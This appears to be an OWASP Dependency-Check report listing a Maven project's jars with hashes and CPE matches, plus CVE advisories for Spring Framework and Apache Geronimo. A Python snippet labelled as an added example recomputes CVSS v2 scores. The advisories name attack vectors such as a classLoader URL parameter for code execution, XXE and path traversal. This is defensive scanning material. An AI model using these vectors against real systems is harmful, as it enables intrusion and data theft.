| spatial4j-0.6.jar | | org.locationtech.spatial4j:spatial4j:0.6 | | 0 | | 28 |
| noggit-0.8.jar | | org.noggit:noggit:0.8 | | 0 | | 16 |
| asm-commons-5.1.jar | | org.ow2.asm:asm-commons:5.1 | | 0 | | 25 |
| jcl-over-slf4j-1.7.7.jar | cpe:/a:slf4j:slf4j:1.7.7 | org.slf4j:jcl-over-slf4j:1.7.7 | | 0 | Low | 28 |
| solr-core-7.0.1.jar | cpe:/a:apache:solr:7.0.1 | org.apache.solr:solr-core:7.0.1 | High | 4 | Highest | 23 |
| umlet-12.0.jar | | com.umlet:umlet:12.0 | | 0 | | 18 |
| tomcat-juli-7.0.42.jar | cpe:/a:apache_software_foundation:tomcat:7.0.42 | org.apache.tomcat:tomcat-juli:7.0.42 | | 0 | Low | 18 |
| tomcat-annotations-api-7.0.42.jar | | org.apache.tomcat:tomcat-annotations-api:7.0.42 | | 0 | | 16 |
| tomcat-api-7.0.42.jar | cpe:/a:apache_software_foundation:tomcat:7.0.42; cpe:/a:apache_tomcat:apache_tomcat:7.0.42; cpe:/a:apache:tomcat:7.0.42 | org.apache.tomcat:tomcat-api:7.0.42 | High | 44 | Highest | 18 |
| commons-beanutils-core-1.7.0.jar | cpe:/a:apache:commons_beanutils:1.7.0 | commons-beanutils:commons-beanutils-core:1.7.0 | High | 1 | Low | 14 |
| xmlParserAPIs-2.6.2.jar | | xerces:xmlParserAPIs:2.6.2 | | 0 | | 22 |
| xercesImpl-2.6.2.jar | | xerces:xercesImpl:2.6.2 | | 0 | | 25 |
| xalan-2.7.0.jar | cpe:/a:apache:xalan-java:2.7.0 | xalan:xalan:2.7.0 | High | 1 | Highest | 21 |
| xom-1.1.jar | | xom:xom:1.1 | | 0 | | 31 |
| bsh-core-2.0b4.jar | cpe:/a:beanshell_project:beanshell:2.0.b4 | org.beanshell:bsh-core:2.0b4 | Medium | 1 | Low | 22 |
| batik-ext-1.7.jar | cpe:/a:apache:batik:1.7 | org.apache.xmlgraphics:batik-ext:1.7 | High | 3 | Highest | 19 |
| xml-apis-ext-1.3.04.jar | | xml-apis:xml-apis-ext:1.3.04 | | 0 | | 27 |
| nekohtml-1.9.12.jar | | net.sourceforge.nekohtml:nekohtml:1.9.12 | | 0 | | 15 |
| commons-httpclient-3.1.jar | cpe:/a:apache:httpclient:3.1; cpe:/a:apache:commons-httpclient:3.1 | commons-httpclient:commons-httpclient:3.1 | | 0 | Low | 21 |
| antisamy-1.4.3.jar | cpe:/a:antisamy_project:antisamy:1.4.3 | org.owasp.antisamy:antisamy:1.4.3 | Medium | 3 | Highest | 19 |
| esapi-2.0.1.jar | cpe:/a:owasp:enterprise_security_api:2.0.1 | org.owasp.esapi:esapi:2.0.1 | Medium | 2 | Highest | 25 |
| tomcat-coyote-7.0.0.jar | cpe:/a:apache:coyote_http_connector:7.0.0; cpe:/a:apache:tomcat_connectors:7.0.0; cpe:/a:apache_software_foundation:tomcat:7.0.0; cpe:/a:apache_tomcat:apache_tomcat:7.0.0; cpe:/a:apache:tomcat:7.0.0 | org.apache.tomcat:tomcat-coyote:7.0.0 | High | 77 | Highest | 16 |
| spatial4j-0.4.1.jar | | com.spatial4j:spatial4j:0.4.1 | | 0 | | 26 |
| lucene-spatial-4.10.4.jar | | org.apache.lucene:lucene-spatial:4.10.4 | | 0 | | 23 |
| antlr-runtime-3.5.jar | | org.antlr:antlr-runtime:3.5 | | 0 | | 23 |
| elasticsearch-1.5.2.jar | cpe:/a:elasticsearch:elasticsearch:1.5.2 | org.elasticsearch:elasticsearch:1.5.2 | Medium | 2 | Highest | 14 |
| jempbox-1.8.11.jar | cpe:/a:apache:pdfbox:1.8.11 | org.apache.pdfbox:jempbox:1.8.11 | High | 2 | Highest | 30 |
| xmlschema-core-2.2.1.jar | cpe:/a:ws_project:ws:2.2.1 | org.apache.ws.xmlschema:xmlschema-core:2.2.1 | | 0 | Low | 27 |
| cxf-core-3.1.4.jar | cpe:/a:apache:cxf:3.1.4 | org.apache.cxf:cxf-core:3.1.4 | High | 7 | Highest | 32 |
| jboss-jaxrs-api_2.0_spec-1.0.1.Beta1.jar | | org.jboss.spec.javax.ws.rs:jboss-jaxrs-api_2.0_spec:1.0.1.Beta1 | | 0 | | 37 |
| resteasy-jaxrs-services-3.1.1.Final.jar | | org.jboss.resteasy:resteasy-jaxrs-services:3.1.1.Final | | 0 | | 26 |
| jboss-annotations-api_1.2_spec-1.0.0.Final.jar | | org.jboss.spec.javax.annotation:jboss-annotations-api_1.2_spec:1.0.0.Final | | 0 | | 37 |
| activation-1.1.1.jar | | javax.activation:activation:1.1.1 | | 0 | | 21 |
| jcip-annotations-1.0.jar | | net.jcip:jcip-annotations:1.0 | | 0 | | 17 |
| jboss-logging-3.3.0.Final.jar | | org.jboss.logging:jboss-logging:3.3.0.Final | | 0 | | 41 |
| resteasy-jaxrs-3.1.1.Final.jar | | org.jboss.resteasy:resteasy-jaxrs:3.1.1.Final | | 0 | | 26 |
| jna-4.0.0.jar: jnidispatch.dll | | | | 0 | | 2 |
| jna-4.0.0.jar: jnidispatch.dll | | | | 0 | | 2 |
| jna-4.0.0.jar: jnidispatch.dll | | | | 0 | | 2 |
| jansi-1.11.jar: jansi.dll | | | | 0 | | 2 |
| jansi-1.11.jar: jansi.dll | | | | 0 | | 2 |
| plexus-utils-1.5.4.jar (shaded: org.codehaus.plexus:plexus-interpolation:1.0) | | org.codehaus.plexus:plexus-interpolation:1.0 | | 0 | | 12 |
| netty-common-4.1.8.Final.jar (shaded: org.jctools:jctools-core:1.2.1) | | org.jctools:jctools-core:1.2.1 | | 0 | | 11 |
| jansi-1.11.jar (shaded: org.fusesource.hawtjni:hawtjni-runtime:1.8) | | org.fusesource.hawtjni:hawtjni-runtime:1.8 | | 0 | | 13 |
| jansi-1.11.jar (shaded: org.fusesource.jansi:jansi-native:1.5) | cpe:/a:id:id-software:1.5 | org.fusesource.jansi:jansi-native:1.5 | | 0 | Low | 16 |
| jansi-1.11.jar (shaded: org.fusesource.jansi:jansi:1.11) | cpe:/a:id:id-software:1.11 | org.fusesource.jansi:jansi:1.11 | | 0 | Low | 13 |
| htrace-core-3.2.0-incubating.jar (shaded: commons-logging:commons-logging:1.1.1) | | commons-logging:commons-logging:1.1.1 | | 0 | | 16 |

Dependencies

stax-utils-20060502.jar

License:

BSD: https://stax-utils.dev.java.net/source/browse/*checkout*/stax-utils/LICENSE
File Path: /Users/Kevin/.m2/repository/net/java/dev/stax-utils/stax-utils/20060502/stax-utils-20060502.jar
MD5: 6af71b7f47537a53c5adf70423a8fbfc
SHA1: 66fad5029732305ab7863c140eafd9de4972dd34
SHA256: ecafb82b24e0960a2ca360a91101c49d59ecd6b597a05e6150e0d2697b3547af
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: net.java.dev.stax-utils:stax-utils:20060502  Confidence: Highest

stax-api-1.0.1.jar

Description:

StAX API is the standard java XML processing API defined by JSR-173

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/stax/stax-api/1.0.1/stax-api-1.0.1.jar
MD5: 7d436a53c64490bee564c576babb36b4
SHA1: 49c100caf72d658aca8e58bd74a4ba90fa2b0d70
SHA256: d1968436fc216c901fb9b82c7e878b50fd1d30091676da95b2edd3a9c0ccf92e
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: stax:stax-api:1.0.1  Confidence: Highest

maven-scm-api-1.1.jar

Description:

The SCM API provides mechanisms to manage all SCM tools.

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-api/1.1/maven-scm-api-1.1.jar
MD5: 0f6531ffdf68a04468ab6a9d8a9b3f08
SHA1: eb12ceb959edaae4e157fe3337e2b3cbc94f27d4
SHA256: 6310020460a9c9cc37b88355874e573f4dbeb11ff91745a0c5c17f7bd16b6006
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.apache.maven.scm:maven-scm-api:1.1  Confidence: Highest

aopalliance-1.0.jar

Description:

AOP Alliance

License:

Public Domain
File Path: /Users/Kevin/.m2/repository/aopalliance/aopalliance/1.0/aopalliance-1.0.jar
MD5: 04177054e180d09e3998808efa0401c7
SHA1: 0235ba8b489512805ac13a8f9ea77a1ca5ebe3e8
SHA256: 0addec670fedcd3f113c5c8091d783280d23f75e3acb841b61a9cdb079376a08
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: aopalliance:aopalliance:1.0  Confidence: Highest

spring-core-2.5.6.jar

Description:

Spring Framework: Core

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/springframework/spring-core/2.5.6/spring-core-2.5.6.jar
MD5: 378db2cc1fbdd9ed05dff2dc1023963e
SHA1: c450bc49099430e13d21548d1e3d1a564b7e35e9
SHA256: cf37656069488043c47f49a5520bb06d6879b63ef6044abb200c51a7ff2d6c49
Referenced In Project/Scope: trial:compile

Identifiers

  • cpe: cpe:/a:vmware:springsource_spring_framework:2.5.6  Confidence: Low
  • cpe: cpe:/a:pivotal_software:spring_framework:2.5.6  Confidence: Low
  • cpe: cpe:/a:springsource:spring_framework:2.5.6  Confidence: Highest
  • cpe: cpe:/a:pivotal:spring_framework:2.5.6  Confidence: Low
  • maven: org.springframework:spring-core:2.5.6  Confidence: Highest

CVE-2010-1622

Severity: Medium
CVSS Score: 6.0 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
CWE: CWE-94 Improper Control of Generation of Code ('Code Injection')

SpringSource Spring Framework 2.5.x before 2.5.6.SEC02, 2.5.7 before 2.5.7.SR01, and 3.0.x before 3.0.3 allows remote attackers to execute arbitrary code via an HTTP request containing class.classLoader.URLs[0]=jar: followed by a URL of a crafted .jar file.


CVE-2011-2730

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-16 Configuration

VMware SpringSource Spring Framework before 2.5.6.SEC03, 2.5.7.SR023, and 3.x before 3.0.6, when a container supports Expression Language (EL), evaluates EL expressions in tags twice, which allows remote attackers to obtain sensitive information via a (1) name attribute in a (a) spring:hasBindErrors tag; (2) path attribute in a (b) spring:bind or (c) spring:nestedpath tag; (3) arguments, (4) code, (5) text, (6) var, (7) scope, or (8) message attribute in a (d) spring:message or (e) spring:theme tag; or (9) var, (10) scope, or (11) value attribute in a (f) spring:transform tag, aka "Expression Language Injection."


CVE-2013-4152

Severity: Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The Spring OXM wrapper in Spring Framework before 3.2.4 and 4.0.0.M1, when using the JAXB marshaller, does not disable entity resolution, which allows context-dependent attackers to read arbitrary files, cause a denial of service, and conduct CSRF attacks via an XML external entity declaration in conjunction with an entity reference in a (1) DOMSource, (2) StAXSource, (3) SAXSource, or (4) StreamSource, aka an XML External Entity (XXE) issue.


CVE-2013-6429

Severity: Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The SourceHttpMessageConverter in Spring MVC in Spring Framework before 3.2.5 and 4.0.0.M1 through 4.0.0.RC1 does not disable external entity resolution, which allows remote attackers to read arbitrary files, cause a denial of service, and conduct CSRF attacks via crafted XML, aka an XML External Entity (XXE) issue, and a different vulnerability than CVE-2013-4152 and CVE-2013-7315.


CVE-2013-7315

Severity: Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The Spring MVC in Spring Framework before 3.2.4 and 4.0.0.M1 through 4.0.0.M2 does not disable external entity resolution for the StAX XMLInputFactory, which allows context-dependent attackers to read arbitrary files, cause a denial of service, and conduct CSRF attacks via crafted XML with JAXB, aka an XML External Entity (XXE) issue, and a different vulnerability than CVE-2013-4152.  NOTE: this issue was SPLIT from CVE-2013-4152 due to different affected versions.


CVE-2014-0054

Severity: Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-352 Cross-Site Request Forgery (CSRF)

The Jaxb2RootElementHttpMessageConverter in Spring MVC in Spring Framework before 3.2.8 and 4.0.0 before 4.0.2 does not disable external entity resolution, which allows remote attackers to read arbitrary files, cause a denial of service, and conduct CSRF attacks via crafted XML, aka an XML External Entity (XXE) issue.  NOTE: this vulnerability exists because of an incomplete fix for CVE-2013-4152, CVE-2013-7315, and CVE-2013-6429.


CVE-2014-1904

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Cross-site scripting (XSS) vulnerability in web/servlet/tags/form/FormTag.java in Spring MVC in Spring Framework 3.0.0 before 3.2.8 and 4.0.0 before 4.0.2 allows remote attackers to inject arbitrary web script or HTML via the requested URI in a default action.


CVE-2016-9878

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

An issue was discovered in Pivotal Spring Framework before 3.2.18, 4.2.x before 4.2.9, and 4.3.x before 4.3.5. Paths provided to the ResourceServlet were not properly sanitized and as a result exposed to directory traversal attacks.


CVE-2018-1270

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-358 Improperly Implemented Security Check for Standard

Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a remote code execution attack.

Vulnerable Software & Versions:

CVE-2018-1271  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead to a directory traversal attack.

Vulnerable Software & Versions:

CVE-2018-1272  

Severity:Medium
CVSS Score: 6.0 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, provide client-side support for multipart requests. When a Spring MVC or Spring WebFlux server application (server A) receives input from a remote client, and then uses that input to make a multipart request to another server (server B), it can be exposed to an attack, where an extra multipart is inserted in the content of the request from server A, causing server B to use the wrong value for a part it expects. This could lead to privilege escalation, for example, if the part content represents a username or user roles.

Vulnerable Software & Versions:
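Each CVE entry above carries a CVSS v2 base score and the vector it was derived from. The Python below is an added example, not part of the Dependency-Check report or of the tool itself: it recomputes the base score from the vector with the published CVSS v2 base equation (FIRST's v2 guide) and maps it to the NVD v2 severity bands (Low 0.0-3.9, Medium 4.0-6.9, High 7.0-10.0), so the Score/Severity pairs printed in a report can be checked mechanically rather than trusted. The REPORT_LINES table is copied from the entries above; the function and table names are this example's own.

```python
"""Recompute CVSS v2 base scores from the vector strings in a Dependency-Check report.

Added example; not part of the report or of Dependency-Check. Metric weights
and the formula are the CVSS v2 base equation; severity bands are NVD's v2 bands.
"""
from decimal import Decimal, ROUND_HALF_UP

# Metric weights from the CVSS v2 base equation.
_AV = {"L": 0.395, "A": 0.646, "N": 1.0}      # Access Vector: Local / Adjacent / Network
_AC = {"H": 0.35, "M": 0.61, "L": 0.71}       # Access Complexity: High / Medium / Low
_AU = {"M": 0.45, "S": 0.56, "N": 0.704}      # Authentication: Multiple / Single / None
_CIA = {"N": 0.0, "P": 0.275, "C": 0.660}     # C/I/A impact: None / Partial / Complete


def parse_vector(vector: str) -> dict:
    """Split 'AV:N/AC:M/Au:N/C:P/I:P/A:P' into a metric->value map, rejecting malformed input."""
    metrics = {}
    for part in vector.strip().split("/"):
        if ":" not in part:
            raise ValueError(f"malformed metric {part!r} in {vector!r}")
        name, value = part.split(":", 1)
        metrics[name] = value
    expected = {"AV", "AC", "Au", "C", "I", "A"}
    if set(metrics) != expected:
        raise ValueError(f"vector {vector!r} must contain exactly {sorted(expected)}")
    return metrics


def _round1(x: float) -> float:
    """CVSS rounds half up to one decimal; Python's round() is banker's rounding, so use Decimal."""
    return float(Decimal(repr(x)).quantize(Decimal("0.1"), rounding=ROUND_HALF_UP))


def cvss2_base_score(vector: str) -> float:
    """CVSS v2 base score: 0.6*Impact + 0.4*Exploitability - 1.5, times 1.176 unless Impact is 0."""
    m = parse_vector(vector)
    c, i, a = _CIA[m["C"]], _CIA[m["I"]], _CIA[m["A"]]
    impact = 10.41 * (1 - (1 - c) * (1 - i) * (1 - a))
    exploitability = 20 * _AV[m["AV"]] * _AC[m["AC"]] * _AU[m["Au"]]
    f_impact = 0.0 if impact == 0 else 1.176
    return _round1((0.6 * impact + 0.4 * exploitability - 1.5) * f_impact)


def nvd_v2_severity(score: float) -> str:
    """NVD's qualitative bands for CVSS v2, which is what the report's Severity line reflects."""
    if score >= 7.0:
        return "High"
    if score >= 4.0:
        return "Medium"
    return "Low"


def check_report_line(vector: str, reported_score: float, reported_severity: str) -> bool:
    """True when the reported score and severity agree with the recomputed ones."""
    score = cvss2_base_score(vector)
    return score == reported_score and nvd_v2_severity(score) == reported_severity


# (vector, score, severity) triples copied from the report entries above.
REPORT_LINES = [
    ("AV:N/AC:M/Au:N/C:P/I:P/A:P", 6.8, "Medium"),   # CVE-2014-0054
    ("AV:N/AC:M/Au:N/C:N/I:P/A:N", 4.3, "Medium"),   # CVE-2014-1904
    ("AV:N/AC:L/Au:N/C:P/I:N/A:N", 5.0, "Medium"),   # CVE-2016-9878
    ("AV:N/AC:L/Au:N/C:P/I:P/A:P", 7.5, "High"),     # CVE-2018-1270
    ("AV:N/AC:M/Au:S/C:P/I:P/A:P", 6.0, "Medium"),   # CVE-2018-1272
    ("AV:L/AC:L/Au:N/C:P/I:N/A:N", 2.1, "Low"),      # CVE-2008-0732
]

if __name__ == "__main__":
    for vector, score, severity in REPORT_LINES:
        status = "ok" if check_report_line(vector, score, severity) else "MISMATCH"
        print(f"{vector}  reported={score} {severity}  recomputed={cvss2_base_score(vector)}  {status}")
```

A vector with no impact at all (C:N/I:N/A:N) scores 0.0 because the f(Impact) factor is zero, which is the one branch of the equation that is easy to get wrong when reimplementing it.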

plexus-spring-1.2.jar

Description:

 Bridge utility to use plexus components in a SpringFramework context.

File Path: /Users/Kevin/.m2/repository/org/codehaus/plexus/plexus-spring/1.2/plexus-spring-1.2.jar
MD5: f685d843ac463248f6d9021b844b27fe
SHA1: 3b81c51438e5c0a8bc5461041202d5647d13f8aa
SHA256:bd664b9e7dc1e8a4074b46a4a226522cd5fca18f049eff9ccf370db58eab278c
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.codehaus.plexus:plexus-spring:1.2  Confidence:Highest

geronimo-spec-jta-1.0.1B-rc2.jar

File Path: /Users/Kevin/.m2/repository/geronimo-spec/geronimo-spec-jta/1.0.1B-rc2/geronimo-spec-jta-1.0.1B-rc2.jar
MD5: d30af655d27dc060e0060caed2e8c398
SHA1: 3f4da55af12c3f8b1b36bc411d1915733b52cddc
SHA256:06dc7662747c495d8469aa35eda1d3c46b3c0eb0441f03809b6aa68537e4e1b5
Referenced In Project/Scope:trial:compile

Identifiers

CVE-2008-0732  

Severity:Low
CVSS Score: 2.1 (AV:L/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-59 Improper Link Resolution Before File Access ('Link Following')

The init script for Apache Geronimo on SUSE Linux follows symlinks when performing a chown operation, which might allow local users to obtain access to unspecified files or directories.

Vulnerable Software & Versions:

CVE-2011-5034  

Severity:High
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CWE: CWE-20 Improper Input Validation

Apache Geronimo 2.2.1 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters. NOTE: this might overlap CVE-2011-4461.

Vulnerable Software & Versions:

jdo2-api-2.0.jar

Description:

 The Java Data Objects 2.0 (JDO) API is a standard interface-based Java model abstraction of persistence, developed as Java Specification Request 243 under the auspices of the Java Community Process.

File Path: /Users/Kevin/.m2/repository/javax/jdo/jdo2-api/2.0/jdo2-api-2.0.jar
MD5: 5449e46a8f13c0788b8811ffd231c45f
SHA1: b7e19cbd9b2be71442b21c36847a7434d30d6886
SHA256:7462ac58a3ad8a2511cceabe3f98b94a15f087a4322baa4372a5478b480fb908
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: javax.jdo:jdo2-api:2.0  Confidence:Highest

plexus-jdo2-1.0-alpha-8.jar

File Path: /Users/Kevin/.m2/repository/org/codehaus/plexus/plexus-jdo2/1.0-alpha-8/plexus-jdo2-1.0-alpha-8.jar
MD5: 7ed55617340fb8b1448c763fdeffb096
SHA1: 9f9ff7efefa282a0108624c4e4626e1b92c13646
SHA256:5c15529d5f45621844f60c7d86c6529c1bc1477ddfaf53fd52e509f3a57ead30
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.codehaus.plexus:plexus-jdo2:1.0-alpha-8  Confidence:Highest

maven-settings-2.0.9.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/maven-settings/2.0.9/maven-settings-2.0.9.jar
MD5: 6a19eb17efdb4e0c1dd65c32e87b1019
SHA1: ab8d338c00fab0db29af358ab0676c3c02d7329f
SHA256:1e5c98ebc4b9ae1f2c8d843c1dd9701a1c25b9afaff143c3e1fa4d90c22850fe
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven:maven-settings:2.0.9  Confidence:Highest

maven-profile-2.0.9.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/maven-profile/2.0.9/maven-profile-2.0.9.jar
MD5: e1478a4633fef786e33e2717681fe199
SHA1: 0b9b02df9134bff9edb4f4e1624243d005895234
SHA256:88fe952eaf4e28da0533ceef5d8e9b7fc9f09f7f825ab342130bf4b8c3805664
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven:maven-profile:2.0.9  Confidence:Highest

maven-plugin-registry-2.0.9.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/maven-plugin-registry/2.0.9/maven-plugin-registry-2.0.9.jar
MD5: 1f00b6993350f474c5ba3d2f216454f9
SHA1: a7172a87a7cb901cf6df4df9fd89a3c2d3f8a770
SHA256:5e6cc5d0501c8d9b9abf9605283e95733b9428c9033a079502cd4d97cd0c490e
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven:maven-plugin-registry:2.0.9  Confidence:Highest

maven-project-2.0.9.jar

Description:

 This library is used not only to read Maven project object model files, but to assemble inheritance and to retrieve remote models as required.

File Path: /Users/Kevin/.m2/repository/org/apache/maven/maven-project/2.0.9/maven-project-2.0.9.jar
MD5: 5f83007173bd07249b00420ebbd813b0
SHA1: 30ec37813df5a212888a1f3df0b27497ecef4ad8
SHA256:c82db125f53716f59008e3214063869717a976bf857879de6d4092c73cdc7e12
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven:maven-project:2.0.9  Confidence:Highest

maven-model-2.0.9.jar

Description:

 Maven Model

File Path: /Users/Kevin/.m2/repository/org/apache/maven/maven-model/2.0.9/maven-model-2.0.9.jar
MD5: 05fc405395b7dfdd0300929fb2a16bf2
SHA1: 9fb844625928dd992842e180853fbb2b197c9a9d
SHA256:87083dd97721542f2745eede587fbb6cb1aef2b395f46c2bd578c6d9d7b63521
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven:maven-model:2.0.9  Confidence:Highest

maven-artifact-2.0.9.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/maven-artifact/2.0.9/maven-artifact-2.0.9.jar
MD5: c6f1bcc526bc0958dee6cd0fbc9a8dbe
SHA1: 66f0c8baa789fffdf54924cf395b26bbc2130435
SHA256:0b16842a33350f5478c4c717bf664251c27459ec5c0b8d0ca4d0050545aba48b
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven:maven-artifact:2.0.9  Confidence:Highest

maven-repository-metadata-2.0.9.jar

Description:

 Maven Plugin Mapping

File Path: /Users/Kevin/.m2/repository/org/apache/maven/maven-repository-metadata/2.0.9/maven-repository-metadata-2.0.9.jar
MD5: 566d26822d3f3fc8e6a884cd6809d70e
SHA1: dd79022a827b1d577865d5c97f8ad0c7d6b067b7
SHA256:2c302f060de887716be438e0eb0c3d89d7ece213631882446ee0b19880c00dbd
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven:maven-repository-metadata:2.0.9  Confidence:Highest

wagon-provider-api-1.0-beta-2.jar

Description:

 Maven Wagon API that defines the contract between different Wagon implementations

File Path: /Users/Kevin/.m2/repository/org/apache/maven/wagon/wagon-provider-api/1.0-beta-2/wagon-provider-api-1.0-beta-2.jar
MD5: f41eb4e07a725eea3332743a29057855
SHA1: abd1c9ace6e87c94a4b91f5176aeb09d954b23a3
SHA256:0ba6040074d1e193580bae9314392940f5ecd81e3b6d3b3381050360dce033ad
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.wagon:wagon-provider-api:1.0-beta-2  Confidence:Highest

maven-artifact-manager-2.0.9.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/maven-artifact-manager/2.0.9/maven-artifact-manager-2.0.9.jar
MD5: 4940bb2f80c2c36f4b16250bbf383247
SHA1: 53224a5254101fb9b6d561d5a53c6d0817036d94
SHA256:d913865e03e719ac5733260019e98090a12b50683134e65f78c36e8d67f11ff1
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven:maven-artifact-manager:2.0.9  Confidence:Highest

maven-scm-provider-accurev-1.1.jar

Description:

 SCM Provider implementation for AccuRev (http://www.accurev.com/).

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-provider-accurev/1.1/maven-scm-provider-accurev-1.1.jar
MD5: ad7ebe5e2cc44cfa000e7ec358eb638c
SHA1: 10d68f31b82de859e9503136b4686a547cb3a9ca
SHA256:fb5c4cae9e4f967b5d9156133de2f063803bc9ebc7f83f0e3b5d8d1a7b727d4b
Referenced In Project/Scope:trial:runtime

Identifiers

  • maven: org.apache.maven.scm:maven-scm-provider-accurev:1.1  Confidence:Highest

maven-scm-provider-git-commons-1.1.jar

Description:

 Common library for SCM Git Provider.

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-provider-git-commons/1.1/maven-scm-provider-git-commons-1.1.jar
MD5: 6f4fac925bd7f0d91fc2a6ad4956a47e
SHA1: 27b21c9c09bfb02002c103e965d8e4cdaa480229
SHA256:fefa7d23401cebbf5220471b999a455fccc7f43a354631247d4466307659600d
Referenced In Project/Scope:trial:runtime

Identifiers

  • maven: org.apache.maven.scm:maven-scm-provider-git-commons:1.1  Confidence:Highest

maven-scm-provider-gitexe-1.1.jar

Description:

 Executable implementation for SCM Git Provider.

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-provider-gitexe/1.1/maven-scm-provider-gitexe-1.1.jar
MD5: 7c707ed22b1aa8fb588470f2187d308c
SHA1: d1ebbade131e07eb4149f5b0a454da2212634997
SHA256:33c308532240106dcee6945f82ee720e98db14df61f4cb5c7471b8800c1ec05b
Referenced In Project/Scope:trial:runtime

Identifiers

  • maven: org.apache.maven.scm:maven-scm-provider-gitexe:1.1  Confidence:Highest

maven-scm-provider-vss-1.1.jar

Description:

 SCM Provider implementation for VSS (http://msdn.microsoft.com/en-us/vstudio/aa700907.aspx).

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-provider-vss/1.1/maven-scm-provider-vss-1.1.jar
MD5: 75f4a74bc5645bf2d2c859396d7a097b
SHA1: 58971b7a720cd21aa4ba5eb312769ad234352a4a
SHA256:7c7598a4e4ab0f11594b73471d7457f9d936d266bc81805068362eda2db211c2
Referenced In Project/Scope:trial:runtime

Identifiers

  • maven: org.apache.maven.scm:maven-scm-provider-vss:1.1  Confidence:Highest

maven-scm-provider-cvs-commons-1.1.jar

Description:

 Common library for SCM CVS Provider.

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-provider-cvs-commons/1.1/maven-scm-provider-cvs-commons-1.1.jar
MD5: c837e53c38f0dea4fa7c560317b16ab1
SHA1: 198d03e76ab1f5f8b9379f7f52834c92a73ae42b
SHA256:48b7b42ed37d61209b1b5a442c1618e815abe373ea78f8f4ea5db6a0f65943a7
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.scm:maven-scm-provider-cvs-commons:1.1  Confidence:Highest

maven-scm-provider-svn-commons-1.1.jar

Description:

 Common library for SCM SVN Provider.

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-provider-svn-commons/1.1/maven-scm-provider-svn-commons-1.1.jar
MD5: 2a07d9204f1b46fc9ee3f123a2640327
SHA1: 8be8b282cfd6b6ca9787a53945d63042a679fbc4
SHA256:96c2e236e53a59d7cefa411c642b2ab0f5857f1e4f45df5985d15527c0ca1f89
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.scm:maven-scm-provider-svn-commons:1.1  Confidence:Highest

spring-web-2.5.1.jar

Description:

 Spring Framework: Web

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
